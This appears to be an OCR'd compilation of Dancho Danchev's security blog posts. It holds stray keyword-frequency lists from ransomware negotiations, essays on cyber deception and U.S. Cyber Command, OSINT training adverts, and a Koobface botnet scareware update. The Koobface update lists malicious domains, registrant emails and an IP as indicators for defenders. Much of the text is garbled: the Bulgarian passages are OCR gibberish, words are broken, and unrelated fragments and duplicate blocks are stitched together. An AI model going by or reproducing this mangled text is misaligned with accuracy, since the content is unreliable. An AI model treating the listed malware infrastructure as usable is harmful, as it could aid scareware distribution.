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few files 
_ nto 


decryption process 


other files 
customer data 
one file 
sample files 

_ ns 

file narnes 
single file 
other companies 
million dollars 
program files 
small amount 
much money 
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decryption key 
private data 
full arnount 

big discount 
decryption of file 
sample file 
decryptor file 
_ nvwill 

_ ndata 
exfiltrated files 
personal data 
test decryption 


[3] image data 


122.994 
120.298 
120.157 
118.921 
116.575 
110.368 
110.127 
106.946 
103.425 
102.157 
100.973 
100.908 
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99.426 
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stolen files 77.755 
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decryption keys 68.166 
extra time 67.368 
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large amount 65.519 
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data leak 57.002 
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security report 
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small files 
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[5] same amount 


52.065 
51.736 
51.377 
49.523 
49.077 
48.667 
48.767 
48.323 
47 307 
45.570 
45.192 
45 067 
44.074 
44.730 
44.708 
44 362 
44.294 
44 057 
43.505 
43.403 
43.483 
43.446 
43.202 
43.008 
42.776 
42.511 
41.675 
41.590 
41.461 
41.406 
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entire network 
downloaded data 
confidential files 
big files 

same amount 
public company 
_ drop 

list of data 
image file 
decryptor program 
last time 

huge amount 
required amount 
good offer 
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data listing 

_ nyour network 
good faith 
amount of cash 
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42.511 
41.675 
41.590 
41.461 
41.406 
40.969 
40.607 
40.446 
40.389 
40.276 
40.111 
40.046 
40.046 
39.916 
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38.663 
38.264 
38.073 
37.756 
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37.721 
37.273 
37.273 
37.273 
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37.003 
36.837 
36.164 
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[17]Web Based Botnet Command and Control Kit 2.0 

[18]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks 
[19]The DDoS Attack Against Bobbear.co.uk 

[20]Russian Homosexual Sites Under (Commissioned) DDoS Attack 


This post has been reproduced from [21]Dancho Danchev’s blog. 
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ttp://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines .htm 


ttp://ddanchev.blogspot.com/2009/04/massive-sql-injections-through- search. htm 


ttp://ddanchev. blogspot .com/2009/07/social-engineering-driven-web-malware. html 
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19.6.2 A Brief Overview of U.S Cyber Command’s Global Cyberspace Operations Syn- 
chronization (GCOS) Concept - Or Can We Make The Difference Between Real- 
Time and Synchronization in Cyberspace? (2023-06-02 10:21) 


[1] 


R*7_—-Global Cyberspace 
; Operations Synchronization 


Defense Science Board 


21 February 2017 


The overall classification of this briefing is: SEGREFF//NOFORN 
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Derived From: NSA/CSSM 1-52 
Oated: 20111011 

Dechassify Onc 20620206 


It should be clearly said that the current state of the U.S Cyber Command's overall Global 
Cyberspace Operations Synchronization (GCOS) Concept is fairly naive and a bit childish in 
the context of what | can best describe as real-time cyberspace operations where the primary 
difference between synchronization and real-time can be best described like Feedburner vs 
OSINT as a concept where Feedburner despite being a well known product and a service is 
basically delivering its content and features using synchronization compared to other modern 
approaches given the fact that they can be achieved such as for instance real-time cyberspace 
operations where the ultimate goal would be to achieve the unachievable namely the use of 
real-time cyberspace operations compared to marely synchronizing them to achieve something 
that | won’t really elaborate on such as for instance the surreal synchronization of U.S Cyber 
Command cyberspace operations compared to real-time cyberspace operations. 


Real-time communications have to do with pushing the very boundaries of an individual or an 
organization sticking to common good where in most of the cases the common good can get 
someone in trouble. 


I’ll now proceed and give you a pretty decent of something that I’m unknowingly extremely 
good at and a process and a concept excluding the fact that it’s not a process at all in case you 
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can’t or don’t really know or bother to implement it but rather remains a bit of acommercial and 
a bit of a sophisticated practice known as military and cyberspace deception and cladestine 
and special cyber operations type of activity where the ultimate goal would be to eventually 
make people and folks laugh one way or another based on what can be truly achieved here. 


Let’s take a moment and give you a brief example on the process. Military and cyberspace 
deception and clandestine and special cyber operations activity as a concept has been around 
since the early days where | originally began preaching on the use of "People’s Information 
Warfare" by Chinese hacktivists where the ultimate goal would be to crowdsource the actual 
bandwidth for a particular campaign to the massess and actually to sometimes unaware end 
users and organizations which believe it or not takes and it better doesn’t to another direct 
namely the MakeLoveNotSpam project initiative dating back to 2004. 


"Setting the globe" based type of scenario is a bit childish explanation of what global segments 
of synchronization really means compared to real-time cyberspace operations and what should 
be really considered here is the true nature of what real time really means in the global context 
of cyberspace operations. 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjSUJOf£ 9f 6KswuZPZbWYm06 2AbWPXzqRf0jTEGeloRWgPHi 
r3hkHYzhc5DpDIjadZEc_eiLYAQ9woPdoMcPMjBswWoxXX8hnod0ys3 


19.6.3 Assessing the Current State of Cyber and Cyber Military Deception Concepts 
Online - Part One (2023-06-02 13:30) 


[1] 
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The overall state of today’s modern cyber deception and cyber military deception online has 
to do with a maze of sophisticated and advanced asset camouflaging activities including a 
basically a state of overall cyber dominance and cyber power in the context of systematic 
professional and sophisticated control and distribution of information locally including interna- 
tionally in the context of having others not just perceive but actually do something provoked 
or prompted by a sophisticated information campaign distributed in a classified or secret way. 


The primary purpose behind coming up with this post is to shed more light into my understand- 
ing of the overall concept and to actually demonstrate and give relevant examples from the 
field. 


Misperception: 


Among the few basic concepts for starters in the field of cyber and military cyber deception 
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next to information operations has to do with misperception where the very bottom of a specific 
concept is basically twisted to the point of having others do things and make impact in the 
information camping without really perceiving the true state of the process where others will 
eventually benefit from what you’re initially prone to believe and will even greatly benefit from 
what you’re actually about to do based on the specific information operation. 


Surprise 


A closely kept secret and an information operation is everyone’s surprise at a later stage when 
the actual implementation phase or actual maturity if any phase and finally the actual launch 
of the information operation takes place leading it to become everyone's surprise. 


Deception 


The very basics of cyber and cyber military deception has to do with a very but closely kept 
secret word and a phase where the ultimate reality is that this is a process known as on pur- 
posely or indirectly both consciously or on purpose making others think act upon or actually 
believe to a certain extend and take action basically the process known as a twisted reality. 


Deliberate misleading 


The process has to do with either attempting to trick or entice an individual or an organization 
into heading in the opposite direction or coming up with a process that can either sort of impose 
costs to its current upcoming and emerging both real life and cyber operations. 


False represenation of environment 


This is a relatively sophisticated process both in real life and in cyberspace that could ultimately 
lead to an utopian world or everyone’s dream come true reality where we could have entire 
cyber populations both malicious and not malicious act think train and even educate them- 
selves based on a wrongly perceived reality where the ultimate goal would be for someone to 
basically manage a cyber deception and cyber military deception information operation where 
the ultimate goal would be to launch and actually monitor its process throughout the decade. 


Everything that’s seen can be actually hidden 


This is a relatively advanced and sophisticated approach that entices users and organizations 
into living in the other side of the world where the ultimate goal would be to portray a situation 
or a specific information operation where the ultimate goal would be to entice people and 
organizations into taking action based on the information operation. 


Everything’s that’s ready is actually unready 


This is a similar approach that could take into consideration the timelines of events and an 
individual’s or an organization’s development cycle for a specific purpose where the ultimate 
goal would be to launch an information operation. 


1. https: //blogger . googleusercontent.com/img/a/AVvXsEgpW2-XCiLggsuhnat8_5Py4__9EUf5vsK30bGHQHikka_rthOFRfu6cB 


cefXZUzyeF 6vkZSWrdcZRzDCP_uhjQ-Y3F6UakVQZMqWvr YHAVYD3p 
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19.6.4 Dancho Danchev’s OSINT and Threat Intelligence Training Video Demonstra- 
tion in Bulgarian - Part Two (2023-06-04 06:12) 


[1] 


ABOUTUS rn 
Dancho Danchev Presents 


cho Danchev is an internationally recognized 

e security blogger OSINT analyst and 
that's currently running one of 
opular security publications 


al blog -h chev.blogspot.com since mae 
er whic ved approximately 5.6M 
page views since its original start In Ividua S 


BASIC AND ADVANCED 


os . OSINT AND THREAT INTELLIENCE 

; ; r PROGRAM BUILDING AND TRAINING 

REACHUS A : 
+359876893890 = : 

Email: dancho.danchev@hush.com 5 
https; //ddanchev.blogspot.com : 


I’ve decided to share with everyone a recently released YouTube video demonstration in Bul- 
garian on the topic of OSINT and threat intelligence training. 


Here’s a sample Table of Contents for the OSINT and the Threat Intelligence training in Bulgar- 
ian: 


Kon ce WHTepecyBa OT WHgAuBYUAyaNHO unu rpynoBo obyYeHve B ciepata Ha OS- 
INT aHanu3 uv npeBeHuWNA Ha KUu6ep NpecTenneHuA U aHanu3z U OOpaboTKa Ha kubep 
aTaKY U3BeECTeH OLE KATO NMpakTUKaTa Threat Intelligence? Moxete ga Bugute 
moeto CV tTyk - [2]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho 
_Danchev _CV _2021.pdf noptdonuo oT aHanu3u uw nNpoyyBaHuA oT 2005 go 
2023 Tyk -_ [3]https://archive.org/details/@ddanchev sBugeo AemMOHCTpauMu TyK - 
[4]https://youtube.com/@ddanchev u mon xKypHan Tyk - [5]https://ddanchev.blogspot.com 
AeMOHCTpalNa 3a HayYeHoTO Tyk - [6]https://archive.org/download/dancho-danchev-cyber- 
threat-actors-analys is-2021-2/Dancho Danchev Cyber Threat Actors Analysis _2021- 
2.pdf KakKTO “ MOA MemMoOap Ha Boesrapcku tyk - [7]https://archive.org/download/dancho- 
danchev-kiber-razuznavane-audio-kn iga-Ol-memoar/Dancho _Danchev _Kiber —_Razuz- 
navane _Memoar _02.pdf KakTo wu Bugeo oT nocnegHuaA Cyber Security Talks Bulgaria - 
[8]https://archive.org/download/dancho-danchev-cyber-security-talks-bulga — ria-2022-video- 
presentation-01/Dancho Danchev _Cyber Security Talks Bulgaria 2022 Video _Presen- 
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tation _01.mp4 kKakTo uw BCMUYKUY MON Npe3zeHTauMu Tyk - [Y]https://archive.org/details/rsa- 
europe-presentation-01 KaKTO YU BCUYKY MOUW NpakTUYeCKM aHAaJIM3U Ha KUOep atau 3a MOA 
pa6botogaten tyk - [10]https://archive.org/details/dancho-danchev-whois-xml-api-maltego- 
bull etproof-infrastructure-2 


NMpumepHua kypc 3a OSINT o6yYeHue KouTO NpeANaraM BKJIOUBA: 


¢ HocturaHe fo WU3tToOYHUKa Ha Kubep Atakata Mo Bpeme Ha AHanu3a Ha UHqbopmauua c 
Ny6nny4Hu U3stoyHuun 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WHdbopmauna c Ny6nuyHun U3TOYHUUN B aHasM3a Ha KUOep 
aTaku 


¢ VW3snon3BaHe Ha Pa3y3HaBaHe Ha WUHdopmauua c My6nnyHu WU3ToyHuun B Oopbata c 
npecTbnneHuata 


¢ Kon e Danyo JlaHyueB? 
* Kou Ca HAKON OT TeEKYLUUTE MU VU ObAeLWM NpoeKkTu B ccbepata? 


¢ OOoraTABaHe Ha UHCopmMauuaTa NO Bpeme Ha AHanu3a Ha Undbopmauua c Ny6nnuyHu 
VU3TOYHULIN 


* OCHOBNM Ha Pa3y3HaBaHeTo C NyO6nuy4Hn U3TOYHUUM Ha UHcbopmauna 

¢ Mpaktuyecka DemoHctpauna Ha AHanu3 Ha UHcbopmauna c My6nn4Hu U3ToOYHuuN 

¢ MpaktTuyecku Mpumepu Ha AHanu3 Ha Uncbopmauna c Ny6nnyHu U3touHuun 

¢ MpakTuYeckKu CbBeTU NO Bpeme Ha AHasv3a Ha WHdopmauna c My6nuyHu U3TOYHULIN 
¢ MlpegactaBaHe Ha Kypca 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUN 3a HanpegHannu 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
V3TOYHNuUN 3a HaynHaeuin 


¢ TakTuku U Metogonorun 3a HaynHaelln 
¢ TakTuKu vu Metotogonorunu 3a HanpegHann 


e TekylwO CbCTOAHNe Ha Na3sapa 3a NposAyKTU U ycnyruv CBbp3aHN Cc Pa3y3HaBaHe Ha 
aVUHcbopmauna c Ny6nnyHu U3stToOYHuuUY Ha UHtbopmauna 


* MvHaNeH U3snuTt vu Benpocu 

Mpumep kypc no threat intelligence Ko“TO npeANaram BKIOUBa: 

¢ Bop6a c KuO6epnpecTBnHocTTa B KOHTeKCTAa Ha U3NON3BaHe Ha UHCopMaunaA 3a 3anNaxu 
¢ BbeWeTO Ha pa3y3HaBaHeTO Ha 3amsaxu 


¢ YCbBbPLUCHCTBAaHY NpakTUKM 3a pa3y3HaBaHe Ha 3ansaxu KOHWeNnuUNUY vu MeTOgONOrUN - 
Npaktuyecku npumep 


¢ BbBegeHne 


* Kak ga u3non3Bate nyOnnyHu uv co6cTBeHU 6a3N DaHHUY 3a pa3y3HaBaHe Ha 3annNaxu 
3a KaMnNaHUuW 3a NpwvnUucBaHe Ha yYaCTHMLM B KVUOepHeTWYHU 3anNaxu, BKAHOYWTeHO 
KPbCTOCAHU NpenpartKyU VU KPbCTOCAaHAa NpoOBepKa 
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* Kak ga o6Ooratute loC 3a UANaTa Cu KOMNaHUA (VHANKaTOPUN 3a KOMNpOMeTUpaHe) C 
NOmMOuTa Ha nyOnuyHu uv co6cTBeHY V“3TOYHULM UW fa CBbpKeTe TOYKUTe NpNY ronama 
Kubepataka VU KaMnaHuA 3a AKTbOP B KUOepHeTUYHa 3annaxa 


¢ W3non3BaHe Ha OSINT B KOHTeKCTa Ha CbOupaHe Ha UH*opmauyaA 3a 3annaxu 


¢ V3cnenBaHe Ha KuOepnpectTbnneHuaA UU pa3y3HaBaHe Ha 3annaxu loC (WHAMKaTOp 3a 
KOMNpomnuc) OboraTABaHe B KOHTeKCTa Ha U3NOs13BaHe Ha OSINT 


* Mpaktukata 3a 6op6a c kKuOepnpecTbnneHuata 4pe3 pa3sy3HaBaHe Ha 3annaxu 
* KOHLIENUUN 3a pa3y3HaBaHe Ha 3annaxu 3a HaYWHaeLN 


¢ MeTogonorun 3a NPpOaAKTUBHO pa3yY3HaBaHe Ha 3allaxu 


Metogonorunu 3a pa3y3HaBaHe Ha 3annaxn 


O6oraTaABaHe Ha UH*opmalina 3a 3anNaxv B KOHTeKCTA Ha U3NON3BaHe Ha OSINT 


* Kak fa nNpeBbpHeTe BaLUUTe KNNeCHTM B NACVBHUY VU aKTUBHY pa3npegeneHu CeH30pU 3a 
CbOupaHe Ha UHCbopmMauvA 3a 3anNaxn? 


* OCHOBU Ha Ppa3Y3HaABaHEeTO Ha 3alslaxu 


¢ Pa3LUNPeHO PYHKLINOHMpPaHe U NOAAbPXKaHe Ha NporpamMa 3a pa3y3HaBaHe Ha 3anmsaXxu B 
luanaTa KOMNaHMA 3a HanpesAHanu noTpebuTennu 


¢ MpakTUyecky CbBeETU 3a pa3y3HaBaHe Ha 3amaxn 
* OCHOBUTe Ha 3€NO4BaHeTO Ha pa3y3HaBaHe Ha 3anmsaxu 3a HAYWNHaeLV 
¢ Pa3y3HaBaHe Ha 3anmaxu B KOHTeKCTa Ha KUOepataka. 


. Pa3y3HaBaHe Ha 3ansIaXUTE B KOHTECKCTa Ha U3NON3ZBAHE Ha TEXHNYECKO CcbOupaHe 3a aTaKU 
C NPUNUCBAaHE Ha aAKTbOP Ha KUbepHeTUYHa 3anslaxa 


: Pa3LuupeHn KOHLIENLIUN 3a Ppa3yY3HABAHE Ha 3alslaxu 


* Kak ga npeoOpa3yBate KpawHuTe TOYKUY Ha cnyxKuTenuTe Ha BalwwaTa KOMNAHNUA B 
pa3npegeneH CeH30p 3a CbOuUpaHe Ha UHCopmMauWA 3a NACUBHU VU AKTUBHU pa3y3HaBaHuAr 
3a 3annaxn? 


¢ TeKYLUO CbCTOAHME Ha EKOCUNCTeMaTa 3a pa3y3HaBaHe Ha 3ansaxu 
¢ TeKYLUO CbCTOAHMe Ha Na3apa 3a pa3y3HaBaHe Ha 3anNaxn 


¢ HauctuHa nu pabotu metogonoruata ,ArperupaHe wu 3a6paBAHe” B OONacTTa Ha 
pa3y3HaBaHeTO Ha 3annaxn? 


° OCHOBUTE Ha CTapTMUpaHeTO, NOAAbPXKaHeTO UV yNpaBseHUeTO Ha Nporpama 3a pa3y3HaBaHe 
Ha 3annaxv B LsslaTa KOMNaHMA 3a HadYNHaeLlin 


« Kak ga o6yuute BALUUTE AHAJIUZATOPU 3a Pa3Y3HABAHE Ha 3anNaxu fla Obaat poK 3Be3auU 
Ha UHAYCTPUATA 3a CUFYPHOCT U AHAJIUTUYHUTE VU TEXHUYECKU POK 3Be3 qu? 


Sample video demonstration of Dancho Danchev’s OSINT and Threat Intelligence training in 
Bulgarian: 
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Dancho Danchey 

independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


In case you’re interested in inquiring about individual or group OSINT or threat intelligence 
training for you or for your team feel free to drop me a line at dancho.danchev@hush.com 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEj dqHf JrWMLhCgApsiWsoIL2ocIRKCxDHO0q7L5vaDxqldcia 
vbn9Ksyg33rVQQnxRM1kPnpf ePnO8kBOuJFFtc8It3Hjcgu7mHzKH 


9. https: //archive.org/details/rsa-europe-presentation-01 


10. 


5.11.3 Koobface Botnet’s Scareware Business Model - Part Two (2009-11-11 19:03) 


Stan tp | Quchist tip | Loan 


Video posted by * Tiger * 


ue ocoroco te a CS 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


unt, Of gon in f you are abou 


UPDATED - Wednesday, November 18, 2009: A [1]new update is pushed to the hundreds 
of thousands infected hosts, which is now performing the redirection using dynamically 
generated .swf files, with every page using the same title "Wonderful Video". The redirection 
is also a relatively static process. 


For instance, if the original koobface redirector is koobface.infected.host/301, followed 
by the .swf redirection it will output koobface.infected.host/301/?go. 


New redirectors and scareware domains pushed within the past few hours include - everlast- 
movie .cn - Email: gmk2000@yahoo.com; smile-life .cn - Email: gmk2000@yahoo.com ; harry- 
pott .cn - Email: gmk2000@yahoo.com, [2]beprotected9 .com - Email: essi@calinsella.eu and 
[3Jantivir3 .com - Email: essi@calinsella.eu. 


UPDATED - Tuesday, November 17, 2009: Koobface is [4]resuming scareware (Inst _312s2.exe) 
operations at [5]91.212.107.103 which was taken offline for a short period of time. ISP has 
been notified again, action should be taken shortly. The current domain portfolio including 
new ones parked there: 


ereuqba .cn - Email: spscript@hotmail.com 
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19.6.5 Dancho Danchev’s OSINT and Threat Intelligence Training Video Demonstra- 
tion in Bulgarian - Part One (2023-06-04 06:12) 


ABOUTUS wa! 
Dancho Danchev Presents 


Dancho Danchev ts an internationally recognized 
cybercrime researcher security blogger OSINT analyst and 
threat intelligence analyst that's currently running one of 
the security industry's most popular security publications 
onal blog - http 


. s' //ddanchev. blogspot.com since oy tive 
ved approximately 5.6M 
page views since its original start individuals 


BASIC AND ADVANCED 


. if = " 
: OSINT AND THREAT INTELLIENCE 
Ye PROGRAM BUILDING AND TRAINING 
REACH US 7 
+359876893890 : 


Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 


HTTPS://DDANCHEV.BLOGSPOT.COM 


I’ve decided to share with everyone a recently released YouTube video demonstration in 
Bulgarian on the topic of OSINT and threat intelligence training. 


Here’s a sample Table of Contents for the OSINT and the Threat Intelligence training in 
Bulgarian: 


Kon ce UHTepecyBa OT VHAUBUAYANHO uN FpynoBo ObyyeHue B ccbepata Ha OSINT aHann3 u 
NpeBeHLUMA Ha KuUOep NpecTEMIeHUA VU aHanu3 U OOpaboTKa Ha Kubep aTaku U3BeECTEH OLE 
KaTO NpakTukKaTa Threat Intelligence? MoxkeTe fa BuguTe MOeTO CV TykK - 
[1]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho Danchev _CV 
_2021.pdf noptcdonuo oT aHanu3u wu npoyyBaHua OT 2005 fo 2023 Tyk - 
[2]https://archive.org/details/@ddanchev Bugeo QDeEMOHCTpauun TykK - 
[3]https://youtube.com/@ddanchev u moa KypHan Tyk - [4]https://ddanchev. blogspot.com 
AeMOHCTpaLINA 3a HAYYEHOTO TYK - 
[5]https://archive.org/download/dancho-danchev-cyber-threat-actors-analysis 
-2021-2/Dancho Danchev Cyber Threat Actors Analysis _2021-2.pdf KakTo u Mo” MeMoap 
Ha Bbsrapckyu TykK - 
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[6]https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-knig 
a-01-memoar/Dancho Danchev Kiber Razuznavane Memoar 02.pdf kakTo u Bugeo OT 
nocneguHua Cyber Security Talks Bulgaria - 

[7 ]https://archive.org/download/dancho-danchev-cyber-security-talks-bulgari 
a-2022-video-presentation-01/Dancho Danchev Cyber Security Talks Bulgaria 2022 
_Video Presentation 01.mp4 KakTo uv BCUYKY MON Npe3ZeHTAauMN TyK - 
[8]https://archive.org/details/rsa-europe-presentation-01 KakTo UU BCMYKM MOU NpakTuUYeCcKU 
aHasiu3u Ha KN6ep atau 3a MOA paboTosaTen TyK - 
[9]https://archive.org/details/dancho-danchev-whois-xml-api-maltego-bulletp 
roof-infrastructure-2 


NMpumepuHua kypc 3a OSINT o6yY4eHue KouTO NpeANaraM BKJIOUBA: 


¢ HocturaHe go WU3stToYHUKa Ha Kubep Atakata Mo Bpeme Ha AHanu3a Ha Unqdbopmauua c 
Ny6nnuy4Hu UstouHuun 


¢ W3non3BaHe Ha Pa3y3HaBaHe Ha WHdopmauna c Ny6nuyHun U3TOYHUUN B aHasM3a Ha KUOep 
aTakn 


¢ VW3non3BaHe Ha Pa3y3HaBaHe Ha WUHdopmauua c My6nnyHu WU3ToyHuun B Oopbata c 
npecTbnneHuata 


¢ Kon e Danyo JlaHyueB? 
* Kou Ca HAKON OT TeEKYLUUTE MU VU O6bAeLWM NpoekTu B ccbepata? 


¢ OOoraTABaHe Ha UHCopmMauivaTa NO Bpeme Ha AHanu3a Ha UHdbopmauua c Ny6nnyHu 
VU3TOYHULIN 


* OCHOBNM Ha Pa3y3HaBaHeTOo C NyO6nuyHn U3ZTOYHUUM Ha UHcbopmMauna 

¢ MpaktTuyecka JemoHctpauna Ha AHanu3 Ha Uncbopmauna c Ny6nuyHu U3stouHuun 

¢ MpaktTuyecku Npumepu Ha AHann3 Ha Uncbopmauna c Ny6nnyHu U3stTouHuuy 

¢ MpakTUYecku CbBeTU NO BpeMe Ha AHayv3a Ha WHcdbopmauna c My6nuyHu U3TOYHULIM 
¢ MpegctaBaHe Ha Kypca 


¢ CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUN 3a HanpegHannu 


* CbOupaHe Ha TexHuyecka UHcbopmauna no Bpeme Ha AHasiu3a Ha WHcbopmauna c Ny6nuyHn 
VU3TOYHNuUN 3a HaynHaeuin 


¢ TakTuku uv Metogonorun 3a HaynHaeln 
¢ TakTukKu u Metotogonoruu 3a HanpedaHann 


¢ TeKyLuO CbCTOAHNe Ha Na3apa 3a NposAyKTU uu ycnyru cCBbp3aHN Cc Pa3y3HaBaHe Ha 
aVUHcdopmauna c Ny6nuyHu U3TouHuuN Ha UWcbopmauna 


¢ OuHaNneH U3snuTt vu Benpocu 

Mpumep kypc no threat intelligence Ko“TO npeANaram BKIOUBa: 

¢ Bop6a c KuO6epnpecTBnHocTTa B KOHTeKCTAa Ha U3NO3BaHe Ha UH*opmMaunWaA 3a 3annaxu 
¢ BbAeuWeTO Ha pa3y3HaBaHeTO Ha 3amaxu 


¢ YCbBbPLUCHCTBAaHY NpakTUKM 3a pa3y3HaBaHe Ha 3ansaxu KOHUenuUNUY uv MeTOgONOruUN - 
Npaktuyecku npumep 
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¢ BbBegzeHne 


* Kak ga u3non3Bate ny6nnyHu uv coOcTBeHu 6a3u DaHHUM 3a pa3y3HaBaHe Ha 3annaxu 
3a KaMnNaHUN 3a NpunucBaHe Ha yYaCcTHULM B KUOepHeTMYHU 3annNaxu, BKIOYUTeENHO 
KPbCTOCAaHU NpenpatTkU VU KPbCTOCaHA NpoBepKa 


* Kak ga o6Ooratute loC 3a UANaTa CM KOMNaHUMA (VHANKaTOPUN 3a KOMNpOMeTUPpaHe) C 
nNOomMOouTa Ha nyOnuyHu uv co6cTBeHY U3TOYHULM UW fa CBbpKeTe TOYKUTe NpNY ronama 
Kubepataka U KaMnaHuA 3a AKTbOP B KUOepHeTUYHa 3annaxa 


¢ U3non3BaHe Ha OSINT B KOHTeKCTa Ha CbOupaHe Ha UH*opmauyvaA 3a 3annaxu 


¢ Vi3cnenBaHe Ha KuUOepnpectTbnneHuaA u pa3y3HaBaHe Ha 3annaxu loC (WHAMKaTOp 3a 
KOMNpomuc) OboraTABaHe B KOHTeKCTa Ha U3NOs13BaHe Ha OSINT 


¢ [pakTukKaTa 3a 6op6a C KuOepnpecTbnneHuata 4pe3 pa3yY3HaABaHe Ha 3allaxu 


¢ KOHLIENLINM 3a pa3sy3HaBaHe Ha 3annaxu 3a HAYNHaAeLIN 


Metogonorun 3a NPOAKTUBHO Ppa3Y3HaBaHe Ha 3allaxu 


¢ MeTogonorunu 3a pa3y3HaBaHe Ha 3annaxn 


O6oraTaABaHe Ha UH*opmalina 3a 3anNaxV B KOHTeKCTA Ha U3NON3BaHe Ha OSINT 


* Kak da nNpeBbpHeTe BaluUTe KNNECHTM B NACVBHU VU aKTUBHY pa3npegeneHu CeH30pV 3a 
CbOupaHe Ha UHopmauivaA 3a 3annaxu? 


* OCHOBU Ha Ppa3yY3HaABaHEeTO Ha 3alslaxu 


¢ Pa3LUNPeHO PYHKLINOHMpPaHe VU NOAAbPXKaHe Ha NporpamMa 3a pa3y3HaBaHe Ha 3amsaxu B 
LuanaTa KOMNaHMA 3a HanpesAHanu noTpebuTennu 


¢ MpakTUYeCKU CbBeTU 3a Pa3y3HaBaHe Ha 3anNaxu 
* OCHOBUTe Ha 3a€NOYBaHeTO Ha Ppa3Y3HaABaHe Ha 3alsIaXU 3a HAYWNHACLUNM 
¢ Pa3y3HaBaHe Ha 3anmslaxXV B KOHTeKCTa Ha KuOepataka. 


bd Pa3y3HaBaHe Ha 3ansIaAXUTE B KOHTECKCTa Ha U3NOI3ZBAHE Ha TEXHNYECKO cbOupaHe 3a aTaKU 
C NPUNUCBAaHE Ha AKTbOP Ha KUbepHeTUYHa 3anslaxa 


: Pa3lLuupeHn KOHLIENLIUN 3a Pa3yY3HABAHE Ha 3alslaxu 


* Kak ga npeoOpa3yBaTte KpawHuTe TOYKUY Ha cnyxKuTenuTe Ha BalwaTa KOMNAHUA B 
pa3npegeneH CeH30p 3a CbOuUpaHe Ha UHCopmMauWA 3a NACUBHU VU AKTUBHU pa3y3HaBaHuAr 
3a 3annaxn? 


e TeKYLUO CbCTOAHME Ha EKOCUNCTeMaTa 3a pa3y3HaBaHe Ha 3ansaxu 
¢ TeKyYLUO CbCTOAHMe Ha Na3apa 3a pa3y3HaBaHe Ha 3annaxn 


¢ HavuctuHa nu pabotu metogonorusata ,ArperupaHe u 3a6paBaAHe“” B OOnacTTa Ha 
pa3y3HaBaHeTO Ha 3amsaxu? 


° OCHOBMTe Ha CTapTUpaHeTO, NOAAbpPXKaHeTO UV yNpaBeHUeTO Ha Nporpama 3a pa3y3HaBaHe 
Ha 3annaxv B LsslaTa KOMNaHMA 3a HAaYNHaeLlin 


« Kak ga o6yuute BAaLUUTE AHAJIUZATOPU 3a Pa3Y3HABAHE Ha 3anNaxu fla ObgaTt pokK 3Be3au 
Ha UHAYCTPUATA 3a CUFYPHOCT U AHAJIUTUYHUTE U TEXHUYECKU POK 3Be3 gu? 


Sample video demonstration of Dancho Danchev’s OSINT and Threat Intelligence training in 
Bulgarian: 
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Dancho Danchev 

Independent Contractor 
https://ddanchey. blogspot.com 
Email: dancho.danchevy@hush.com| 
+359876893890 


In case you’re interested in inquiring about individual or group OSINT or threat intelligence 
training for you or for your team feel free to drop me a line at dancho.danchev@hush.com 


1. https://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho_Danchev_CV_2021 .pdf 


ttps://archive.org/details/@ddanche 
ttps://youtube.com/@ddanche 


2. 

3. 

4. https: //ddanchev.blogspot.com/ 

5. https://archive.org/download/dancho-danchev-cyber-threat-actors-analysis-2021-2/Dancho_Danchev_Cyber_Th: 


eat_Actors_Analysis_2021-2.pdf 


6. https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar/Dancho_Danchev_Kibe 


Razuznavane_Memoar_02.pdf 


7. ttps://archive.org/download/dancho-danchev-cyber-security-talks-bulgaria-2022-video-presentation-01/Da 


cho_Danchev_Cyber_Security_Talks_Bulgaria_2022_Video_Pre 
8. https: //archive.org/details/rsa-europe-presentation-01 
9. 


ttps://archive. org/details/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure-2 


19.6.6 Dancho Danchev’s OSINT Introduction Training Video Demonstration in Bul- 
garian - Part Three (2023-06-05 00:11) 


[1] 
27696 


ABOUTUS = 
Dancho Danchev Presents 


Dancho Danchev is an internationally recognized 
prese security blogger OSINT analyst and 
that's currently running one of 


he security industry’ t popular security publications - . 
ance chev blogspot.com sinos eu 
er, 2 Ww ved approximately 5.6M 
page views since its original start In IVI Ua S 


BASIC AND ADVANCED 


. Ze = ‘ 
OSINT AND THREAT INTELLIENCE 
= PROGRAM BUILDING AND TRAINING 
REACH US 7 
+359876893890 : 


Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 


HTTPS://DDANCHEV.BLOGSPOT.COM 


I’ve decided to share with everyone a recently released YouTube video demonstration in Bul- 
garian on the topic of OSINT and threat intelligence training. 


Here’s a sample Table of Contents for the OSINT and the Threat Intelligence training in Bulgar- 
ian: 


Kon ce UHTepecyBa OT VHAUBUAYANHO unU FpynoBo ObyyeHve B ccbepata Ha OSINT aHanu3 u 
nNpeBeHLUMA Ha KYUbep npecTEMIeHuA VU aHanu3 U OOpaboTKa Ha Ku6ep aTaku U3BeECTEH OLE 
KaTO NpakTukKaTa Threat Intelligence? MoxkeTe fa BuguTe MOeTO CV TykK - 

[2 ]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho Danchev CV 
_2021.pdf noptcdonuo oT aHanu3u vu npoyyBaHua OT 2005 Ao 2023 Tyk - 
[3]https://archive.org/details/@ddanchev Bugeo QeEMOHCTpauun TykK - 
[4]https://youtube.com/@ddanchev u Moa KypHay Tyk - [5]https://ddanchev.blogspot.com 
AeMOHCTpaLINA 3a HAYYEHOTO TYK - 
[6]https://archive.org/download/dancho-danchev-cyber-threat-actors-analys 
is-2021-2/Dancho Danchev Cyber Threat Actors Analysis _2021-2.pdf kakTo u Moa 
